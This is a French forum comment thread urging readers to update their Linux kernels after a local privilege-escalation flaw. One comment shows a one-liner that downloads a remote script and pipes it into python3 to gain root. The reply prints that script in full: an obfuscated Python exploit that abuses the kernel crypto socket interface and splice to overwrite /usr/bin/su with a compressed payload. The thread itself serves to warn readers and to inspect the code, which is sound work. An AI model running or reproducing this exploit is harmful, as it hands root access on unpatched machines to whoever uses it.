• # Mettez d'urgence vos kernels à jour !

    Posté par  (Mastodon) . Évalué à 5 (+2/-0).

    Sur Arch mise à jour il y a quelques jours (1 semaine ?) la faille marche :

    $ curl https://copy.fail/exp | python3 && su
    # id
    uid=0(root) gid=1002(user) groups=1002(user)
    
    

    En théorie, la théorie et la pratique c'est pareil. En pratique c'est pas vrai.

    • [^] # Re: Mettez d'urgence vos kernels à jour !

      Posté par  (Mastodon) . Évalué à 3 (+1/-0). Dernière modification le 29 avril 2026 à 21:36.

      Plutôt que s'amuser à exécuter directement le script sans voir le code, je préfère voir la source avant.

      Voici le contenu du script d'exploitation de la faille1 :

      #!/usr/bin/env python3
      import os as g,zlib,socket as s
      def d(x):return bytes.fromhex(x)
      def c(f,t,c):
       a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
       try:u.recv(8+t)
       except:0
      f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
      while i<len(e):c(f,i,e[i:i+4]);i+=4
      g.system("su")

Envoyer un commentaire

Suivre le flux des commentaires

Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.